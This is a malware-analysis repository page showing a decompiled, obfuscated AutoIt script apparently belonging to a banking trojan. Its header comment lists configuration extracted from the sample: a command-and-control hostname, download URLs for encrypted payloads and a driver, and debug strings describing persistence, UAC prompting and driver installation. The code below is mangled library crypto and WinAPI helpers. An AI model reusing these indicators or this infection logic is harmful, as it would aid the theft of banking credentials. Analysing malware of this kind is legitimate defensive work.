Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Malware-Misc-RE/2019-05-15-possible-bankerflux-vk.au3
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
1455 lines (1449 sloc)
54.7 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| MD5: f363206183d838911458139b45d0ac6d | |
| h/t @malwarehunterteam | |
| Config: | |
| $ba3x = 40 | |
| $iport = 443 | |
| $bpersistence = 39 | |
| $sinstalldir = @HomeDrive & @HomePath | |
| $stempdir = @TempDir | |
| $busestartupfolder = 40 | |
| $sserver = "port2010kmjutre.camdvr.org" | |
| $scounterurl = "https://test.discoverthings.pw/counter4.php" | |
| $sx86 = "http://" & 274(0, 32767, 1) & ".discoverthings.pw/X86.rc4" | |
| $sx64 = "http://" & 274(0, 32767, 1) & ".discoverthings.pw/X64.rc4" | |
| $sdriverx86 = "https://drive.google.com/uc?authuser=0&id=1Sa-NOdSof4FcUQbUH8V9pq9URtkYnB5h&export=download" | |
| $sdriverx64 = "https://drive.google.com/uc?authuser=0&id=11iWhfhV4c49pWabl9EDcACxzXnrHU7NM&export=download" | |
| $sdriverinstaller = "https://drive.google.com/uc?authuser=0&id=1LgBlbz4opeHnm7NflOxUu2XUag0h1aQD&export=download" | |
| debuglog("Downloading datastorage.tmp") | |
| debuglog("Decrypting datastorage") | |
| debuglog("Server is visible right now") | |
| debuglog("Server is not visible right now") | |
| debuglog("Downloading driver files") | |
| debuglog("Installing driver") | |
| debuglog("Restarting machine") | |
| debuglog("Setting as startup through registry - interpreted") | |
| debuglog("Setting as startup through startup folder - interpreted") | |
| debuglog("Setting as startup through startup folder - not interpreted") | |
| debuglog("Setting as startup through registry - not interpreted") | |
| debuglog("Registering execution") | |
| debuglog("Waiting") | |
| debuglog("Running interpreted. Installing itself") | |
| debuglog("Driver is not installed") | |
| debuglog("Will request UAC") | |
| debuglog("UAC Requested. PID: " & $iproc) | |
| debuglog("Not running interpreted. Installing files") | |
| debuglog("Instancing module") | |
| debuglog("Failed to load module. Restarting...") | |
| debuglog("Module running") | |
| debuglog("Process started") | |
| debuglog("Will install itself") | |
| debuglog("Will install required files") | |
| debuglog("Will install driver") | |
| */ | |
| 2930$mb_ok = 0 | |
| 2930$mb_okcancel = 1 | |
| 2930$mb_abortretryignore = 2 | |
| 2930$mb_yesnocancel = 3 | |
| 2930$mb_yesno = 4 | |
| 2930$mb_retrycancel = 5 | |
| 2930$mb_canceltrycontinue = 6 | |
| 2930$mb_help = 16384 | |
| 2930$mb_iconstop = 16 | |
| 2930$mb_iconerror = 16 | |
| 2930$mb_iconhand = 16 | |
| 2930$mb_iconquestion = 32 | |
| 2930$mb_iconexclamation = 48 | |
| 2930$mb_iconwarning = 48 | |
| 2930$mb_iconinformation = 64 | |
| 2930$mb_iconasterisk = 64 | |
| 2930$mb_usericon = 128 | |
| 2930$mb_defbutton1 = 0 | |
| 2930$mb_defbutton2 = 256 | |
| 2930$mb_defbutton3 = 512 | |
| 2930$mb_defbutton4 = 768 | |
| 2930$mb_applmodal = 0 | |
| 2930$mb_systemmodal = 4096 | |
| 2930$mb_taskmodal = 8192 | |
| 2930$mb_default_desktop_only = 131072 | |
| 2930$mb_right = 524288 | |
| 2930$mb_rtlreading = 1048576 | |
| 2930$mb_setforeground = 65536 | |
| 2930$mb_topmost = 262144 | |
| 2930$mb_service_notification = 2097152 | |
| 2930$mb_rightjustified = $mb_right | |
| 2930$idtimeout = -1 | |
| 2930$idok = 1 | |
| 2930$idcancel = 2 | |
| 2930$idabort = 3 | |
| 2930$idretry = 4 | |
| 2930$idignore = 5 | |
| 2930$idyes = 6 | |
| 2930$idno = 7 | |
| 2930$idclose = 8 | |
| 2930$idhelp = 9 | |
| 2930$idtryagain = 10 | |
| 2930$idcontinue = 11 | |
| 2930$str_nocasesense = 0 | |
| 2930$str_casesense = 1 | |
| 2930$str_nocasesensebasic = 2 | |
| 2930$str_stripleading = 1 | |
| 2930$str_striptrailing = 2 | |
| 2930$str_stripspaces = 4 | |
| 2930$str_stripall = 8 | |
| 2930$str_chrsplit = 0 | |
| 2930$str_entiresplit = 1 | |
| 2930$str_nocount = 2 | |
| 2930$str_regexpmatch = 0 | |
| 2930$str_regexparraymatch = 1 | |
| 2930$str_regexparrayfullmatch = 2 | |
| 2930$str_regexparrayglobalmatch = 3 | |
| 2930$str_regexparrayglobalfullmatch = 4 | |
| 2930$str_endisstart = 0 | |
| 2930$str_endnotstart = 1 | |
| 2930$sb_ansi = 1 | |
| 2930$sb_utf16le = 2 | |
| 2930$sb_utf16be = 3 | |
| 2930$sb_utf8 = 4 | |
| 2930$se_utf16 = 0 | |
| 2930$se_ansi = 1 | |
| 2930$se_utf8 = 2 | |
| 2930$str_utf16 = 0 | |
| 2930$str_ucs2 = 1 | |
| 2930$format_message_allocate_buffer = 256 | |
| 2930$format_message_ignore_inserts = 512 | |
| 2930$format_message_from_string = 1024 | |
| 2930$format_message_from_hmodule = 2048 | |
| 2930$format_message_from_system = 4096 | |
| 2930$format_message_argument_array = 8192 | |
| 32_winapi_beep($ifreq = 500, $iduration = 1000) | |
| 28$aresult = 58("kernel32.dll", "bool", "Beep", "dword", $ifreq, "dword", $iduration) | |
| 4@error534287(@error, @extended, 40) | |
| 34$aresult[0] | |
| 33 | |
| 32_winapi_formatmessage($iflags, $psource, $imessageid, $ilanguageid, 36$pbuffer, $isize, $varguments) | |
| 28$sbuffertype = "struct*" | |
| 4233($pbuffer)5$sbuffertype = "wstr" | |
| 28$aresult = 58("kernel32.dll", "dword", "FormatMessageW", "dword", $iflags, "struct*", $psource, "dword", $imessageid, "dword", $ilanguageid, $sbuffertype, $pbuffer, "dword", $isize, "ptr", $varguments) | |
| 4@error23$aresult[0]534287(@error + 10, @extended, 0) | |
| 4$sbuffertype = "wstr"5$pbuffer = $aresult[5] | |
| 34$aresult[0] | |
| 33 | |
| 32_winapi_geterrormessage($icode, $ilanguage = 0, 30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 28$aret = 58("kernel32.dll", "dword", "FormatMessageW", "dword", 4096, "ptr", 0, "dword", $icode, "dword", $ilanguage, "wstr", "", "dword", 4096, "ptr", 0) | |
| 4@error23$aret[0]534287(@error, @extended, "") | |
| 34287($_icurrenterror, $_icurrentextended, 327($aret[5], "[" & @LF & "," & @CR & "]*\Z", "")) | |
| 33 | |
| 32_winapi_getlasterror(30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 28$aresult = 58("kernel32.dll", "dword", "GetLastError") | |
| 34287($_icurrenterror, $_icurrentextended, $aresult[0]) | |
| 33 | |
| 32_winapi_getlasterrormessage(30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 28$ilasterror = _winapi_getlasterror() | |
| 28$tbufferptr = 65("ptr") | |
| 28$ncount = _winapi_formatmessage(19($format_message_allocate_buffer, $format_message_from_system), 0, $ilasterror, 0, $tbufferptr, 0, 0) | |
| 4@error534287(-@error, @extended, "") | |
| 28$stext = "" | |
| 28$pbuffer = 66($tbufferptr, 1) | |
| 4$pbuffer5 | |
| 4$ncount > 05 | |
| 28$tbuffer = 65("wchar[" & ($ncount + 1) & "]", $pbuffer) | |
| $stext = 66($tbuffer, 1) | |
| 4330($stext, 2) = @CRLF5$stext = 337($stext, 2) | |
| 8 | |
| 58("kernel32.dll", "handle", "LocalFree", "handle", $pbuffer) | |
| 8 | |
| 34287($_icurrenterror, $_icurrentextended, $stext) | |
| 33 | |
| 32_winapi_messagebeep($itype = 1) | |
| 28$isound | |
| 23$itype | |
| 211 | |
| $isound = 0 | |
| 212 | |
| $isound = 16 | |
| 213 | |
| $isound = 32 | |
| 214 | |
| $isound = 48 | |
| 215 | |
| $isound = 64 | |
| 216 | |
| $isound = -1 | |
| 24 | |
| 28$aresult = 58("user32.dll", "bool", "MessageBeep", "uint", $isound) | |
| 4@error534287(@error, @extended, 40) | |
| 34$aresult[0] | |
| 33 | |
| 32_winapi_msgbox($iflags, $stitle, $stext) | |
| 23(0) | |
| 249($iflags, $stitle, $stext & " ") | |
| 33 | |
| 32_winapi_setlasterror($ierrorcode, 30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 58("kernel32.dll", "none", "SetLastError", "dword", $ierrorcode) | |
| 34287($_icurrenterror, $_icurrentextended, 42) | |
| 33 | |
| 32_winapi_showerror($stext, $bexit = 39) | |
| 23(0) | |
| 249($mb_systemmodal, "Error", $stext & " ") | |
| 4$bexit535 | |
| 33 | |
| 32_winapi_showlasterror($stext = "", $babort = 40, $ilanguage = 0, 30$_icurrenterror = @error, 30$_icurrentextended = @extended) | |
| 28$serror | |
| 28$ilasterror = _winapi_getlasterror() | |
| 91 | |
| $serror = _winapi_geterrormessage($ilasterror, $ilanguage) | |
| 4@error1$ilanguage5 | |
| $ilanguage = 0 | |
| 6 | |
| 18 | |
| 8 | |
| 10 | |
| 4333($stext, $str_stripleading + $str_striptrailing)5 | |
| $stext &= @CRLF & @CRLF | |
| 6 | |
| $stext = "" | |
| 8 | |
| _winapi_msgbox(19(262144, 21(16, -2 * (3$ilasterror))), $ilasterror, $stext & $serror) | |
| 4$ilasterror5 | |
| _winapi_setlasterror($ilasterror) | |
| 4$babort5 | |
| 35$ilasterror | |
| 8 | |
| 8 | |
| 34287($_icurrenterror, $_icurrentextended, 1) | |
| 33 | |
| 32_winapi_showmsg($stext) | |
| _winapi_msgbox($mb_systemmodal, "Information", $stext) | |
| 33 | |
| 32__comerrorformating(36$ocomerror, $sprefix = @TAB) | |
| 2830$str_striptrailing = 2 | |
| 28$serror = "COM Error encountered in " & @ScriptName & " (" & $ocomerror.scriptline & ") :" & @CRLF & $sprefix & "Number " & @TAB & "= 0x" & 199($ocomerror.number, 8) & " (" & $ocomerror.number & ")" & @CRLF & $sprefix & "WinDescription" & @TAB & "= " & 333($ocomerror.windescription, $str_striptrailing) & @CRLF & $sprefix & "Description " & @TAB & "= " & 333($ocomerror.description, $str_striptrailing) & @CRLF & $sprefix & "Source " & @TAB & "= " & $ocomerror.source & @CRLF & $sprefix & "HelpFile " & @TAB & "= " & $ocomerror.helpfile & @CRLF & $sprefix & "HelpContext " & @TAB & "= " & $ocomerror.helpcontext & @CRLF & $sprefix & "LastDllError " & @TAB & "= " & $ocomerror.lastdllerror & @CRLF & $sprefix & "Retcode " & @TAB & "= 0x" & 199($ocomerror.retcode) | |
| 34$serror | |
| 33 | |
| 2930$fc_nooverwrite = 0 | |
| 2930$fc_overwrite = 1 | |
| 2930$fc_createpath = 8 | |
| 2930$ft_modified = 0 | |
| 2930$ft_created = 1 | |
| 2930$ft_accessed = 2 | |
| 2930$ft_array = 0 | |
| 2930$ft_string = 1 | |
| 2930$fsf_createbutton = 1 | |
| 2930$fsf_newdialog = 2 | |
| 2930$fsf_editcontrol = 4 | |
| 2930$ft_nonrecursive = 0 | |
| 2930$ft_recursive = 1 | |
| 2930$fo_read = 0 | |
| 2930$fo_append = 1 | |
| 2930$fo_overwrite = 2 | |
| 2930$fo_createpath = 8 | |
| 2930$fo_binary = 16 | |
| 2930$fo_unicode = 32 | |
| 2930$fo_utf16_le = 32 | |
| 2930$fo_utf16_be = 64 | |
| 2930$fo_utf8 = 128 | |
| 2930$fo_utf8_nobom = 256 | |
| 2930$fo_ansi = 512 | |
| 2930$fo_utf16_le_nobom = 1024 | |
| 2930$fo_utf16_be_nobom = 2048 | |
| 2930$fo_utf8_full = 16384 | |
| 2930$fo_fullfile_detect = 16384 | |
| 2930$eof = -1 | |
| 2930$fd_filemustexist = 1 | |
| 2930$fd_pathmustexist = 2 | |
| 2930$fd_multiselect = 4 | |
| 2930$fd_promptcreatenew = 8 | |
| 2930$fd_promptoverwrite = 16 | |
| 2930$create_new = 1 | |
| 2930$create_always = 2 | |
| 2930$open_existing = 3 | |
| 2930$open_always = 4 | |
| 2930$truncate_existing = 5 | |
| 2930$invalid_set_file_pointer = -1 | |
| 2930$file_begin = 0 | |
| 2930$file_current = 1 | |
| 2930$file_end = 2 | |
| 2930$file_attribute_readonly = 1 | |
| 2930$file_attribute_hidden = 2 | |
| 2930$file_attribute_system = 4 | |
| 2930$file_attribute_directory = 16 | |
| 2930$file_attribute_archive = 32 | |
| 2930$file_attribute_device = 64 | |
| 2930$file_attribute_normal = 128 | |
| 2930$file_attribute_temporary = 256 | |
| 2930$file_attribute_sparse_file = 512 | |
| 2930$file_attribute_reparse_point = 1024 | |
| 2930$file_attribute_compressed = 2048 | |
| 2930$file_attribute_offline = 4096 | |
| 2930$file_attribute_not_content_indexed = 8192 | |
| 2930$file_attribute_encrypted = 16384 | |
| 2930$file_share_read = 1 | |
| 2930$file_share_write = 2 | |
| 2930$file_share_delete = 4 | |
| 2930$file_share_readwrite = 19($file_share_read, $file_share_write) | |
| 2930$file_share_any = 19($file_share_read, $file_share_write, $file_share_delete) | |
| 2930$generic_all = 268435456 | |
| 2930$generic_execute = 536870912 | |
| 2930$generic_write = 1073741824 | |
| 2930$generic_read = -2147483648 | |
| 2930$generic_readwrite = 19($generic_read, $generic_write) | |
| 2930$file_encoding_utf16le = 32 | |
| 2930$fe_entire_utf8 = 1 | |
| 2930$fe_partialfirst_utf8 = 2 | |
| 2930$fn_fullpath = 0 | |
| 2930$fn_relativepath = 1 | |
| 2930$fv_comments = "Comments" | |
| 2930$fv_companyname = "CompanyName" | |
| 2930$fv_filedescription = "FileDescription" | |
| 2930$fv_fileversion = "FileVersion" | |
| 2930$fv_internalname = "InternalName" | |
| 2930$fv_legalcopyright = "LegalCopyright" | |
| 2930$fv_legaltrademarks = "LegalTrademarks" | |
| 2930$fv_originalfilename = "OriginalFilename" | |
| 2930$fv_productname = "ProductName" | |
| 2930$fv_productversion = "ProductVersion" | |
| 2930$fv_privatebuild = "PrivateBuild" | |
| 2930$fv_specialbuild = "SpecialBuild" | |
| 2930$frta_nocount = 0 | |
| 2930$frta_count = 1 | |
| 2930$frta_intarrays = 2 | |
| 2930$frta_entiresplit = 4 | |
| 2930$flta_filesfolders = 0 | |
| 2930$flta_files = 1 | |
| 2930$flta_folders = 2 | |
| 2930$fltar_filesfolders = 0 | |
| 2930$fltar_files = 1 | |
| 2930$fltar_folders = 2 | |
| 2930$fltar_nohidden = 4 | |
| 2930$fltar_nosystem = 8 | |
| 2930$fltar_nolink = 16 | |
| 2930$fltar_norecur = 0 | |
| 2930$fltar_recur = 1 | |
| 2930$fltar_nosort = 0 | |
| 2930$fltar_sort = 1 | |
| 2930$fltar_fastsort = 2 | |
| 2930$fltar_nopath = 0 | |
| 2930$fltar_relpath = 1 | |
| 2930$fltar_fullpath = 2 | |
| 2930$path_original = 0 | |
| 2930$path_drive = 1 | |
| 2930$path_directory = 2 | |
| 2930$path_filename = 3 | |
| 2930$path_extension = 4 | |
| 2930$prov_rsa_full = 1 | |
| 2930$prov_rsa_aes = 24 | |
| 2930$crypt_verifycontext = -268435456 | |
| 2930$hp_hashsize = 4 | |
| 2930$hp_hashval = 2 | |
| 2930$crypt_exportable = 1 | |
| 2930$crypt_userdata = 1 | |
| 2930$kp_algid = 7 | |
| 2930$calg_md2 = 32769 | |
| 2930$calg_md4 = 32770 | |
| 2930$calg_md5 = 32771 | |
| 2930$calg_sha1 = 32772 | |
| 2930$calg_sha_256 = 32780 | |
| 2930$calg_sha_384 = 32781 | |
| 2930$calg_sha_512 = 32782 | |
| 2930$calg_3des = 26115 | |
| 2930$calg_aes_128 = 26126 | |
| 2930$calg_aes_192 = 26127 | |
| 2930$calg_aes_256 = 26128 | |
| 2930$calg_des = 26113 | |
| 2930$calg_rc2 = 26114 | |
| 2930$calg_rc4 = 26625 | |
| 2930$calg_userkey = 0 | |
| 29$__g_acryptinternaldata[3] | |
| 32_crypt_startup() | |
| 4__crypt_refcount() = 05 | |
| 28$hadvapi32 = 64("Advapi32.dll") | |
| 4$hadvapi32 = -1534287(1001, 0, 40) | |
| __crypt_dllhandleset($hadvapi32) | |
| 28$iproviderid = $prov_rsa_aes | |
| 28$aret = 58(__crypt_dllhandle(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $iproviderid, "dword", $crypt_verifycontext) | |
| 4@error23$aret[0]5 | |
| 28$ierror = @error + 1002, $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| 63(__crypt_dllhandle()) | |
| 34287($ierror, $iextended, 40) | |
| 6 | |
| __crypt_contextset($aret[1]) | |
| 8 | |
| 8 | |
| __crypt_refcountinc() | |
| 3439 | |
| 33 | |
| 32_crypt_shutdown() | |
| __crypt_refcountdec() | |
| 4__crypt_refcount() = 05 | |
| 58(__crypt_dllhandle(), "bool", "CryptReleaseContext", "handle", __crypt_context(), "dword", 0) | |
| 63(__crypt_dllhandle()) | |
| 8 | |
| 33 | |
| 32_crypt_derivekey($vpassword, $ialgid, $ihashpasswordid = $calg_md5) | |
| 28$aret = 0, $tbuff = 0, $hcrypthash = 0, $ierror = 0, $iextended = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| 11 | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ihashpasswordid, "ptr", 0, "dword", 0, "handle*", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 10 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $hcrypthash = $aret[5] | |
| $tbuff = 65("byte[" & 14($vpassword) & "]") | |
| 69($tbuff, 1, $vpassword) | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $tbuff, "dword", 68($tbuff), "dword", $crypt_userdata) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 20 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptDeriveKey", "handle", __crypt_context(), "uint", $ialgid, "handle", $hcrypthash, "dword", $crypt_exportable, "handle*", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 30 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $vreturn = $aret[5] | |
| 1239 | |
| 4$hcrypthash <> 0558(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash) | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| 32_crypt_destroykey($hcryptkey) | |
| 28$aret = 58(__crypt_dllhandle(), "bool", "CryptDestroyKey", "handle", $hcryptkey) | |
| 28$ierror = @error, $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| _crypt_shutdown() | |
| 4$ierror23$aret[0]5 | |
| 34287($ierror + 10, $iextended, 40) | |
| 6 | |
| 3439 | |
| 8 | |
| 33 | |
| 32_crypt_encryptdata($vdata, $vcryptkey, $ialgid, $bfinal = 39) | |
| 23$ialgid | |
| 21$calg_userkey | |
| 28$icalgused = __crypt_getcalgfromcryptkey($vcryptkey) | |
| 4@error534287(@error, @extended, -1) | |
| 4$icalgused = $calg_rc4525 | |
| 21$calg_rc4 | |
| 414($vdata) = 0534287(0, 0, 13("")) | |
| 24 | |
| 28$ireqbuffsize = 0, $aret = 0, $tbuff = 0, $ierror = 0, $iextended = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| 11 | |
| 4$ialgid <> $calg_userkey5 | |
| $vcryptkey = _crypt_derivekey($vcryptkey, $ialgid) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| 8 | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "ptr", 0, "dword*", 14($vdata), "dword", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 50 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $ireqbuffsize = $aret[6] | |
| $tbuff = 65("byte[" & $ireqbuffsize + 1 & "]") | |
| 69($tbuff, 1, $vdata) | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptEncrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "struct*", $tbuff, "dword*", 14($vdata), "dword", $ireqbuffsize) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 60 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $vreturn = 15(66($tbuff, 1), 1, $ireqbuffsize) | |
| 1239 | |
| 4$ialgid <> $calg_userkey5_crypt_destroykey($vcryptkey) | |
| _crypt_shutdown() | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| 32_crypt_decryptdata($vdata, $vcryptkey, $ialgid, $bfinal = 39) | |
| 23$ialgid | |
| 21$calg_userkey | |
| 28$icalgused = __crypt_getcalgfromcryptkey($vcryptkey) | |
| 4@error534287(@error, @extended, -1) | |
| 4$icalgused = $calg_rc4525 | |
| 21$calg_rc4 | |
| 414($vdata) = 0534287(0, 0, 13("")) | |
| 24 | |
| 28$aret = 0, $tbuff = 0, $ttempstruct = 0, $ierror = 0, $iextended = 0, $iplaintextsize = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| 11 | |
| 4$ialgid <> $calg_userkey5 | |
| $vcryptkey = _crypt_derivekey($vcryptkey, $ialgid) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| 8 | |
| $tbuff = 65("byte[" & 14($vdata) + 1000 & "]") | |
| 414($vdata) > 0569($tbuff, 1, $vdata) | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptDecrypt", "handle", $vcryptkey, "handle", 0, "bool", $bfinal, "dword", 0, "struct*", $tbuff, "dword*", 14($vdata)) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 70 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $iplaintextsize = $aret[6] | |
| $ttempstruct = 65("byte[" & $iplaintextsize + 1 & "]", 67($tbuff)) | |
| $vreturn = 15(66($ttempstruct, 1), 1, $iplaintextsize) | |
| 1239 | |
| 4$ialgid <> $calg_userkey5_crypt_destroykey($vcryptkey) | |
| _crypt_shutdown() | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| 32_crypt_hashdata($vdata, $ialgid, $bfinal = 39, $hcrypthash = 0) | |
| 28$aret = 0, $tbuff = 0, $ierror = 0, $iextended = 0, $ihashsize = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| 11 | |
| 4$hcrypthash = 05 | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptCreateHash", "handle", __crypt_context(), "uint", $ialgid, "ptr", 0, "dword", 0, "handle*", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 10 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $hcrypthash = $aret[5] | |
| 8 | |
| $tbuff = 65("byte[" & 14($vdata) & "]") | |
| 69($tbuff, 1, $vdata) | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptHashData", "handle", $hcrypthash, "struct*", $tbuff, "dword", 68($tbuff), "dword", $crypt_userdata) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 20 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| 4$bfinal5 | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptGetHashParam", "handle", $hcrypthash, "dword", $hp_hashsize, "dword*", 0, "dword*", 4, "dword", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 30 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $ihashsize = $aret[3] | |
| $tbuff = 65("byte[" & $ihashsize & "]") | |
| $aret = 58(__crypt_dllhandle(), "bool", "CryptGetHashParam", "handle", $hcrypthash, "dword", $hp_hashval, "struct*", $tbuff, "dword*", $ihashsize, "dword", 0) | |
| 4@error23$aret[0]5 | |
| $ierror = @error + 40 | |
| $iextended = @extended | |
| 43$aret[0]5$iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| $vreturn = 66($tbuff, 1) | |
| 6 | |
| $vreturn = $hcrypthash | |
| 8 | |
| 1239 | |
| 4$hcrypthash <> 01$bfinal558(__crypt_dllhandle(), "bool", "CryptDestroyHash", "handle", $hcrypthash) | |
| _crypt_shutdown() | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| 32_crypt_hashfile($sfilepath, $ialgid) | |
| 28$dtempdata = 0, $hfile = 0, $hhashobject = 0, $ierror = 0, $iextended = 0, $vreturn = 0 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| 11 | |
| $hfile = 110($sfilepath, $fo_binary) | |
| 4$hfile = -15 | |
| $ierror = 1 | |
| $iextended = _winapi_getlasterror() | |
| $vreturn = -1 | |
| 18 | |
| 8 | |
| 11 | |
| $dtempdata = 112($hfile, 512 * 1024) | |
| 4@error5 | |
| $vreturn = _crypt_hashdata($dtempdata, $ialgid, 39, $hhashobject) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $vreturn = -1 | |
| 182 | |
| 8 | |
| 182 | |
| 6 | |
| $hhashobject = _crypt_hashdata($dtempdata, $ialgid, 40, $hhashobject) | |
| 4@error5 | |
| $ierror = @error + 100 | |
| $iextended = @extended | |
| $vreturn = -1 | |
| 182 | |
| 8 | |
| 8 | |
| 1240 | |
| 1239 | |
| _crypt_shutdown() | |
| 4$hfile <> -1590($hfile) | |
| 34287($ierror, $iextended, $vreturn) | |
| 33 | |
| 32_crypt_encryptfile($ssourcefile, $sdestinationfile, $vcryptkey, $ialgid) | |
| 28$dtempdata = 0, $hinfile = 0, $houtfile = 0, $ierror = 0, $iextended = 0, $ifilesize = 105($ssourcefile), $iread = 0, $breturn = 39 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| 11 | |
| 4$ialgid <> $calg_userkey5 | |
| $vcryptkey = _crypt_derivekey($vcryptkey, $ialgid) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| 8 | |
| $hinfile = 110($ssourcefile, $fo_binary) | |
| 4$hinfile = -15 | |
| $ierror = 2 | |
| $iextended = _winapi_getlasterror() | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| $houtfile = 110($sdestinationfile, $fo_overwrite + $fo_createpath + $fo_binary) | |
| 4$houtfile = -15 | |
| $ierror = 3 | |
| $iextended = _winapi_getlasterror() | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| 11 | |
| $dtempdata = 112($hinfile, 1024 * 1024) | |
| $iread += 14($dtempdata) | |
| 4$iread = $ifilesize5 | |
| $dtempdata = _crypt_encryptdata($dtempdata, $vcryptkey, $calg_userkey, 39) | |
| 4@error5 | |
| $ierror = @error + 400 | |
| $iextended = @extended | |
| $breturn = 40 | |
| 8 | |
| 123($houtfile, $dtempdata) | |
| 182 | |
| 6 | |
| $dtempdata = _crypt_encryptdata($dtempdata, $vcryptkey, $calg_userkey, 40) | |
| 4@error5 | |
| $ierror = @error + 500 | |
| $iextended = @extended | |
| $breturn = 40 | |
| 182 | |
| 8 | |
| 123($houtfile, $dtempdata) | |
| 8 | |
| 1240 | |
| 1239 | |
| 4$ialgid <> $calg_userkey5_crypt_destroykey($vcryptkey) | |
| _crypt_shutdown() | |
| 4$hinfile <> -1590($hinfile) | |
| 4$houtfile <> -1590($houtfile) | |
| 34287($ierror, $iextended, $breturn) | |
| 33 | |
| 32_crypt_decryptfile($ssourcefile, $sdestinationfile, $vcryptkey, $ialgid) | |
| 28$dtempdata = 0, $hinfile = 0, $houtfile = 0, $ierror = 0, $iextended = 0, $ifilesize = 105($ssourcefile), $iread = 0, $breturn = 39 | |
| _crypt_startup() | |
| 4@error534287(@error, @extended, -1) | |
| 11 | |
| 4$ialgid <> $calg_userkey5 | |
| $vcryptkey = _crypt_derivekey($vcryptkey, $ialgid) | |
| 4@error5 | |
| $ierror = @error | |
| $iextended = @extended | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| 8 | |
| $hinfile = 110($ssourcefile, $fo_binary) | |
| 4$hinfile = -15 | |
| $ierror = 2 | |
| $iextended = _winapi_getlasterror() | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| $houtfile = 110($sdestinationfile, $fo_overwrite + $fo_createpath + $fo_binary) | |
| 4$houtfile = -15 | |
| $ierror = 3 | |
| $iextended = _winapi_getlasterror() | |
| $breturn = 40 | |
| 18 | |
| 8 | |
| 11 | |
| $dtempdata = 112($hinfile, 1024 * 1024) | |
| $iread += 14($dtempdata) | |
| 4$iread = $ifilesize5 | |
| $dtempdata = _crypt_decryptdata($dtempdata, $vcryptkey, $calg_userkey, 39) | |
